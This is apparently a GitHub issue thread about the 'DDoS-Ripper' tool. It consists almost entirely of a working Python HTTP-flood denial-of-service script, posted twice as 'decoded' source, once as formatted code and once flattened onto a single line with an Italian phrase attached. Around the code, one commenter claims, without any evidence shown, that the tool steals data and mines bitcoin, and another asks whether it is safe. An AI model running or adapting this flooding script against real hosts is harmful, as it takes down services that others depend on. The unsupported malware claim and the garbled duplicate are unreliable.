DDoS-Ripper
DDoS-Ripper copied to clipboard
DO NOT DOWNLOAD!
DDOS attack tool has a malware which can steal your data and its also a bitcoin miner so it will ruin your graphics card!!!!!!!!
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import time
import socket
import threading
import logging
import random
from queue import Queue
from optparse import OptionParser
import urllib.request
# Banner
print('''
💕💕💕💕💕💕💕💓 Rippers 💓💕💕💕💕💕💕
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
Attack Script by Hammer
''')
# Global variables
host = ''
port = 80
turbo = 135
quiet = False
queue = Queue()
# Returns a list of common User-Agent strings
def build_user_agents():
uas = []
uas.append("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
"(KHTML, like Gecko) Chrome/72.0 Safari/537.36")
uas.append("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
"(KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36")
uas.append("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 "
"(KHTML, like Gecko) Version/12.1.1 Safari/605.1.15")
# Add more UAs as needed
return uas
# Sends a single HTTP GET request to the target
def down_it(item):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
ua = random.choice(build_user_agents())
request = f"GET / HTTP/1.1\r\nHost: {host}\r\nUser-Agent: {ua}\r\nAccept: */*\r\nConnection: close\r\n\r\n"
s.send(request.encode('utf-8'))
s.shutdown(socket.SHUT_WR)
if not quiet:
print(f"[+] Packet sent to {host}:{port}")
s.close()
except Exception as e:
if not quiet:
print(f"[-] Error sending packet: {e}")
# Worker thread function
def dos():
while True:
item = queue.get()
down_it(item)
queue.task_done()
# Alternative worker (unused)
def dos3():
while True:
item = queue.get()
down_it(item)
queue.task_done()
# Print usage instructions
def usage():
print('''
Usage: python3 dripper.py -s <server> [-p <port>] [-t <threads>] [-q]
Options:
-h, --help Show this help message and exit
-s, --server Server IP or hostname (required)
-p, --port TCP port (default 80)
-t, --turbo Number of threads (default 135)
-q, --quiet Quiet mode (no output)
''')
# Parse command-line parameters
def get_parameters():
global host, port, turbo, quiet
parser = OptionParser()
parser.add_option('-s', '--server', dest='host', help='Target server IP or hostname')
parser.add_option('-p', '--port', dest='port', type='int', default=80,
help='Target port (default 80)')
parser.add_option('-t', '--turbo', dest='turbo', type='int', default=135,
help='Number of threads (default 135)')
parser.add_option('-q', '--quiet', dest='quiet', action='store_true', default=False,
help='Quiet mode (no print)')
(options, args) = parser.parse_args()
if not options.host:
usage()
sys.exit(1)
host = options.host
port = options.port
turbo = options.turbo
quiet = options.quiet
# Main function to start attack
def main():
get_parameters()
print(f"Starting attack on {host}:{port} with {turbo} threads.")
for i in range(turbo):
t = threading.Thread(target=dos)
t.daemon = True
t.start()
try:
# Fill the queue with dummy items
for i in range(100000):
queue.put(i)
queue.join()
except KeyboardInterrupt:
print("\nAttack stopped by user.")
sys.exit()
if __name__ == '__main__':
main()
here is source code I have decoded
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import sys import time import socket import threading import logging import random from queue import Queue from optparse import OptionParser import urllib.request # Banner print(''' 💕💕💕💕💕💕💕💓 Rippers 💓💕💕💕💕💕💕 ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ Attack Script by Hammer ''') # Global variables host = '' port = 80 turbo = 135 quiet = False queue = Queue() # Returns a list of common User-Agent strings def build_user_agents(): uas = [] uas.append("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 " "(KHTML, like Gecko) Chrome/72.0 Safari/537.36") uas.append("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 " "(KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36") uas.append("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 " "(KHTML, like Gecko) Version/12.1.1 Safari/605.1.15") # Add more UAs as needed return uas # Sends a single HTTP GET request to the target def down_it(item): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) ua = random.choice(build_user_agents()) request = f"GET / HTTP/1.1\r\nHost: {host}\r\nUser-Agent: {ua}\r\nAccept: */*\r\nConnection: close\r\n\r\n" s.send(request.encode('utf-8')) s.shutdown(socket.SHUT_WR) if not quiet: print(f"[+] Packet sent to {host}:{port}") s.close() except Exception as e: if not quiet: print(f"[-] Error sending packet: {e}") # Worker thread function def dos(): while True: item = queue.get() down_it(item) queue.task_done() # Alternative worker (unused) def dos3(): while True: item = queue.get() down_it(item) queue.task_done() # Print usage instructions def usage(): print(''' Usage: python3 dripper.py -s <server> [-p <port>] [-t <threads>] [-q] Options: -h, --help Show this help message and exit -s, --server Server IP or hostname (required) -p, --port TCP port (default 80) -t, --turbo Number of threads (default 135) -q, --quiet Quiet mode (no output) ''') # Parse command-line parameters def get_parameters(): global host, port, turbo, quiet parser = OptionParser() parser.add_option('-s', '--server', dest='host', help='Target server IP or hostname') parser.add_option('-p', '--port', dest='port', type='int', default=80, help='Target port (default 80)') parser.add_option('-t', '--turbo', dest='turbo', type='int', default=135, help='Number of threads (default 135)') parser.add_option('-q', '--quiet', dest='quiet', action='store_true', default=False, help='Quiet mode (no print)') (options, args) = parser.parse_args() if not options.host: usage() sys.exit(1) host = options.host port = options.port turbo = options.turbo quiet = options.quiet # Main function to start attack def main(): get_parameters() print(f"Starting attack on {host}:{port} with {turbo} threads.") for i in range(turbo): t = threading.Thread(target=dos) t.daemon = True t.start() try: # Fill the queue with dummy items for i in range(100000): queue.put(i) queue.join() except KeyboardInterrupt: print("\nAttack stopped by user.") sys.exit() if __name__ == '__main__': main()ecco il codice sorgente che ho decodificato
ok , is it safe or not ?